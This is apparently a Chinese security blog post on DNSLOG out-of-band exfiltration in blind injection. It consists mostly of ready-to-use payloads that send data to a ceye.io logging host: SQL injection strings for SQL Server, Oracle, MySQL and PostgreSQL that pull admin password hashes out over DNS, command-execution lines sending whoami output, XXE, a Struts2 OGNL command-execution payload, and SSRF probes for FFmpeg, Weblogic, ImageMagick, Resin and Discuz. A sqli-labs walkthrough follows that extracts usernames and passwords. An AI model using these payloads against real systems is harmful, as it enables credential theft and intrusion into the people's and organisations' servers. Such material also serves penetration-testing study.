DNSLOG在盲注中的使用

0x00 Command Execution

i. *nix:

1
2
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

ii. windows

1
ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

i. SQL Server

1
2
3
4
5
6
7
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

ii. Oracle

1
2
3
4
5
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

iii. MySQL

1
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

iv. PostgreSQL

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

0x02 XML Entity Injection

1
2
3
4
5
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

0x03 Others

i. Struts2

1
2
xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

ii. FFMpeg

1
2
3
4
5
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://ip.port.b182oj.ceye.io
#EXT-X-ENDLIST

iii. Weblogic

1
xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

iv. ImageMagick

1
2
3
4
push graphic-context
viewbox 0 0 640 480
fill 'url(http://ip.port.b182oj.ceye.io)'
pop graphic-context

v. Resin

1
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf

vi. Discuz

1
http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

举例windows下mysql

step2:查询数据库名

1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select database()),'.lvkais.ceye.io\\abc'))),1,1)--+

img

step3:查询当前数据库中的表

1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.columns  where table_schema='security' limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+

img

step4:查询表中的数据

1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_schema=database()  and table_name=0x656d61696c73 limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+

img

step5:获取字段名(写了三个,分别查和联和在一起查)

1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select  username  from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+

img

1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select password from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+

img

1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and if((select load_file(concat('\\\\',(select concat(username,0x5f,password) from users limit 0,1),'.lvkais.ceye.io\\abc'))),1,1)--+

img

step6:破解密码

相关文章
评论
分享
  • sql注入(二)

    报错注入、​ 报错函数(举例) ​ (1)extractvalue(参数1,参数2) ​ 从目标XML中返回查询的字符串,参数1 是string格式...

    sql注入(二)
  • sql注入(一)

    sql注入漏洞,主要介绍有以下几种 5.0mysql数据库特性 手工注入一般步骤 常用的万能密码 联和注入 基于布尔的盲注 基于时间的盲注 5.0mysql数据库特性information _schema 自带,系统库...

    sql注入(一)
  • SSRF原理、操作演示及防御

    SSRF漏洞:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服...

    SSRF原理、操作演示及防御
  • CSRF原理及演示

    CSRF(Crosss Site Request Forgery,跨站请求伪造)是一种网络攻击方式,也被产称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF. CSRF漏洞是因...

    CSRF原理及演示
  • XSS的payload构造及变形

    通常进行XSS脚本攻击时,一般网站都是有防护措施的,比如过滤掉我们script,javascript,或者长度限制等等,这时需要我们对我们的脚本进 行简单的变形,打到我们的目的,下面是我对常见的一些变形的分类,以及部分操作演示1.使用...

    XSS的payload构造及变形
  • XSS漏洞利用和beef使用

    安装好的kail XSS漏洞环境(这里我用的是bWAPP,百度安装即可) 首先打开我们的kail,打开我们的beef工具: q切换到/usr/share/beef-xss或者输入如下代码启动: 1./beef 然后登陆...

    XSS漏洞利用和beef使用
  • 存储型xss-H5页面截取

    环境准备 一个有XSS漏洞的页面,或者搭建一个漏洞平台 注册一个线上的XSS漏洞测试平台(有能力可以自己搭) 1.首先我们需要搭建一个本地的漏洞测试平台,这里我用的事pikachu漏洞平台(https://github.com/...

    存储型xss-H5页面截取
  • 一句话木马及变形

    一句话木马变形 介绍:网站后门,也可以叫做WebShell,黑客在入侵了一个网站后,通常会将一些asp或php文件与网 站服务器WEB目录下正常的网页文件混在一起,使得可以通过使用浏览器来访问这些asp或者php 文件,从而得到一个命...

    一句话木马及变形
  • 文件包含漏洞和PHP伪协议

    文件包含的漏洞形成文件包含就是代码注入的典型代表,PHP的文件包含可以直接执行包含文件的代码,而且包含文件的格式是不受限制的,因此如果我们在包含文件中输入恶意代码,就会导致文件包含漏洞,文件包含漏洞大多可以直接利用获取webshel...

    文件包含漏洞和PHP伪协议
  • msf浏览器自动攻击

    msf浏览器自动攻击 首先查看数据库状态 ,并启动数据库12/etc/init.d/postgresql status/etc/init.d/postgresql start 打开msf:1msfconsole 搜索我们需要的浏览器...

    msf浏览器自动攻击
Please check the comment setting in config.yml of hexo-theme-Annie!